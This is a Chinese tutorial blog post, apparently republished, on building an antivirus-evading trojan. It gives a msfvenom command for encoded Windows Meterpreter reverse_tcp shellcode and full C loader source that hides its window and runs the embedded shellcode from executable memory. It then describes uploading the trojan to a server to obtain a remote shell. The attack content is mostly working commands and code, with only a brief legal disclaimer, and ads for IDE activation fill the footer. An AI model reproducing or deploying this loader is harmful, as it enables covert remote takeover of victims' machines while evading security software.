2021Kali — 木马免杀制作

2021Kali — 木马免杀制作​知道为什么梦里的人都看不清脸么?因为怕你当真。。。—-网易云热评一、通过MSF生成shellcode1、启动MSF,演示版本是6.0.362、通过msfvenom生成相关代码msfvenom-pwindows/meterpreter/reverse_tcp-ex86/shikata_ga_nai-i12-b’\x00’lhost=192.168.139.133lport=8585-fc-p:指定payload-e:指定选择使用的编码…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

​知道为什么梦里的人都看不清脸么?因为怕你当真。。。

—-  网易云热评   

一、通过MSF生成shellcode

1、启动MSF,演示版本是6.0.36

2021Kali -- 木马免杀制作

2、通过msfvenom生成相关代码

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.139.133 lport=8585 -f c

-p:指定payload

-e:指定选择使用的编码

-i:给payload编码的次数

-b:避免出现的字符

-f:输出文件类型

 

二、通过VS2019编译免杀木马

1、启动VS2019新建控制台应用程序

2021Kali -- 木马免杀制作

2、一路下一步,最后将主函数代码替换成下面的代码

 

#include<stdio.h>#include<windows.h>#include <time.h>int main(int argc, char const* argv[]){
  
         ShowWindow(GetConsoleWindow(), SW_HIDE);       unsigned char buf[] =  "\xbf\xc2\xd4\x1d\x34\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9\xb1""\xa3\x31\x78\x15\x03\x78\x15\x83\xe8\xfc\xe2\x37\x6a\x4e\xf4""\xfe\x20\xa8\x3f\xd9\x33\x6f\x34\x86\x88\xa6\x05\xa5\xde\x4f""\x74\x56\xcf\x4c\x7b\x7c\xde\x06\x3a\x6f\xdf\xaa\x1e\x08\xb5""\x15\x96\x18\x69\x5c\x22\x14\x76\x4d\x5a\x55\x46\x84\x4c\xf6""\x5c\xbe\x11\x6f\xce\x02\xa7\xd4\xc0\xc5\xcc\xb8\x72\x3c\xe3""\x45\x50\x2a\x3a\x10\x64\x23\xb4\x8a\xae\x53\x8f\x59\xe4\xec""\xed\x4d\x59\x44\x4a\x1b\x64\x03\x94\xfd\x7b\xb2\x45\x76\x80""\x1d\x95\x02\x81\x32\xed\x5f\x14\x10\x1c\x08\x1f\x3c\xb3\x4b""\x79\xfe\x0c\xa1\x52\xea\x56\xcb\xae\x44\x09\x9a\x7b\xc2\x30""\x25\x7e\x8e\x31\x88\xcc\xf8\x8c\x71\xe5\xde\x79\xbc\x77\x40""\x82\x97\xea\x9a\x36\xe6\xc4\xab\xd7\xc0\xb2\xc6\xa7\x79\xa0""\x9c\x9a\x07\x70\x9b\xe6\x81\x53\x6d\xe5\x4c\xe7\x46\x28\xdb""\x61\x0f\x51\x8e\xca\xcb\x40\xdf\x68\xf7\x73\x2d\xe4\xf0\xea""\xe1\x83\x95\x97\x91\xd2\x46\x51\x8c\xcb\x15\x2a\xb2\xc0\xe6""\x78\x9d\xfd\x3e\x2c\xeb\x6c\xbc\x40\x05\x5b\x2b\x16\x48\x1b""\x01\x09\x38\xdf\xd8\xec\x23\x94\x60\x76\x73\x48\x48\xe9\xe1""\xf4\x5e\x8d\xbf\x95\x46\xae\x66\xc8\x37\x0d\x43\x02\xbd\x4d""\x66\x82\x9d\xf9\x46\xc1\x03\x22\x73\x14\xcd\x0a\x12\x83\xf9""\x54\x04\x7e\x6d\x71\xd7\x8c\x0c\x99\x81\x88\x2d\x62\xcd\xf0""\x6e\x3c\x1c\xa8\x07\xa0\x9d\x43\x5e\xb3\x6b\x2f\x9f\xc3\x66""\x3f\xad\xc3\x99\xde\x83\x22\x7e\x84\x85\x4a\x9c\x41\x85\xb6""\xbd\x04\x39\x7d\xde\x4f\x8d\x86\xfc\x95\xb9\x22\xf1\x63\xfb""\x6c\x59\x2e\x7c\x95\xdf\x1f\x45\x88\x2a\x2f\x7a\x9c\xf1\x75""\xff\x90\x6e\x90\x20\x1e\x6f\x4e\x52\x7d\x1d\xab\x47\x15\x94""\x7e\xf0\x7c\x56\x21\xb4\xdd\xf0\x0b\xdc\x22\x43\x91\x08\x21""\x89\x63\xdc\x54\xc3\xc4\x10\x9d\x9c\xdc\x76\xae\xb4\xf3\x33""\xbd\x57\xb0\xf2\xf9\xbf\xfb\xae\x0d\x8e\x33\x5f\xc4\xdf\xa1""\x74\xd3\xe8\xdf\xbf\xfd\xff\x3c\x1b\x63\x60\x06\x32\xba\x42""\x2c\xd5\x13\xd5\x2a\x93\x5a\x77\xc4\xf0\x70\xb1\x6e\x41\xd0""\x55\x02\xd2\x57\x5e\xf9\x08\x65\xbc\xff\x19\xf7\x45\x9f\x6d""\x6a\x17\x7f\xb1\xae\x8e\xb9\x26\xe0\x28\x0e\xe2\x53\x1a\x0d""\xf8\xc7\xea\xa7\x3e\x5a\xbd\xc9\x30\xf3\x7e\x58\xbc\xe9\x68""\x4d\xb3\x78\xce\x69\x45\x53\x85\xc0\xba\x2a\x9f\x01\xe9\xba""\x43\xee\x8b\x20\x0b\x86\x48\x28\x2c\x72\x64\xfc\x84\x7d\xd6""\xa2\xe5\x73\x56\x7b\x61\xbf\xb8\x30\x23\xb7\x90\x66\x4e\xf6""\xdf\xde\xd4\xd9\x12\xb6\x97\x39\x3e\xed\x1f\xdc\x04\x7e\x81""\x41\x48\xd1\x91\x20\x02\x69\xff\x33\xdb\x87\x7a\xf0\x9c\xa5""\xb2\x3a\x2e\x6b\x4e\xd0\xe1\x76\x24\xbc\xf5\xc8\x26\xf1\x94""\x89\x1d\x2f\xc0\x80\x01\x07\x49\xef\xb2\xb0\x79\x6f\x90\x5a""\x66\x44\xd5\x48\x13\x19\x6e\xa7\xf0\x34\x3f\x93\xe2\x32\x83""\x84\xfe\x3a\x26\x6d\x59\x6b\xe5\x9c\x78\x72\x97\x01\xeb\x90""\x2f\x92\x2f\x83\x96\x52\x93\x5f\xd4\x89\xab\x32\xf9\x29\x2f""\xa6\xe2\x1c\x94\xf0\xdc\xa9\x5c\x88\x78\xde\xca\x7f\x3a\xbf""\xac\xc1\xf3\x7f\x38\xba\xf7\xd0\xd5\x1e\x8e\xa7\xfc\x99\xec""\x12\x83\xc2";       void* exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT,  PAGE_EXECUTE_READWRITE);       memcpy(exec, buf, sizeof buf);       ((void(*)())exec)();              return 0;}

3、生成解决方案

2021Kali -- 木马免杀制作

4、右击生成的木马,使用36X扫描

 

三、实战操作

1、上传生成的木马到服务器,假设就是本地服务器

2、打开msf,选择合适的攻击模块,run运行

3、在服务器运行免杀木马,成功获取shell

2021Kali -- 木马免杀制作

 

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

2021Kali -- 木马免杀制作

2021Kali -- 木马免杀制作

2021Kali -- 木马免杀制作

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/171466.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • 时间轮java实现「建议收藏」

    时间轮java实现「建议收藏」时间轮java实现一、java调度方法:前言在开发高性能服务器中,定时器总是不可或缺的。常见的定时器实现三种,分别是:排序链表,最小堆,时间轮。之前用的定时器是基于最小堆的,如果程序中的定时器数量比较少,基于最小堆的定时器一般可以满足需求,且实现简单。Timer,ScheduledExecutorService时间复杂度O(log(n))因为它们使用的是最小堆的对排…

  • R6034错误解决办法_错误1962解决办法

    R6034错误解决办法_错误1962解决办法转载自:http://hi.baidu.com/%B3%E6%B5%C4%B4%AB%C8%CB/blog/item/1ee503e785263324b838206f.html提示没有找到MSVCR80D.dllR6034AnapplicationhasmadeanattempttoloadtheCruntimelibrarywithoutusinga

    2022年10月28日
  • RewriteRule参数

    RewriteRule参数在重写规制的最后,也可以附加一个或多个标记参数(用逗号分开),从而为新的URL地址添加特殊的标志。这些参数是特殊的RewriteRule命令,并且不是普通的正则表达式,下表列出了一些常用的RewriteRule参数。这些重写标记必须被置于单条规则最后的括号内,多个标记需要适用逗号分开,例如”[NC,L]”RewirteRule标记含义描述RRedirect

  • eclipse中怎么自动补全_空格键坏了

    eclipse中怎么自动补全_空格键坏了eclipse自动补全及其空格键优化(去除空格自动补全)使用eclipse在创建其他工作区间的时候,想要配置代码自动补全,因为老是忘记,每次都要从网上查找,于是就自己总结一下。选1是代码自动补全,只需将“.”换为“.qwertyuiopasdfghjklzxcvbnm”就行了,看起来很乱,其实还是有规律可循的。(只需将键盘上的26字母按从左到右,从上到下的顺序按一遍就行了。)选2是空格不会自动补全,因为按空格会自动补全,所以有时候特别烦,而网上的大多数解决方法是需要改代码的,就会显得特别麻烦。于是

  • 陶瓷电容分类_陶瓷电容电压级别分类

    陶瓷电容分类_陶瓷电容电压级别分类陶瓷电容分为贴装陶瓷电容和插装陶瓷电容两大类。贴装陶瓷电容是多层陶瓷电容,一般耐压不会超过50V,而层数可以达到4000层,插装的陶瓷电容中包括圆片陶瓷电容和独石电容。圆片陶瓷电容也称瓷片电容,是单层的,耐压从50V~6000V都较为普遍。同样容值下,瓷片电容受温度影响更小,更适合应用在微弱信号放大电路的滤波中。独石电容全称是片式多层陶瓷电容器,(网上有资料说其实就是陶瓷贴片电容的

  • IBM-B24光纤交换机配置zone

    IBM-B24光纤交换机配置zoneB24的配置使用WEB方式,很多时候会出现打不开配置页面的问题,这种情况大多数是因为java或者ie版本的问题,个人推荐使用ie8,java使用1.6.0_25版本。具体配置步骤可参考此链接中的内容https://wenku.baidu.com/view/fb97a8ef0975f46527d3e103.html 转载于:https://blog.51cto.com…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号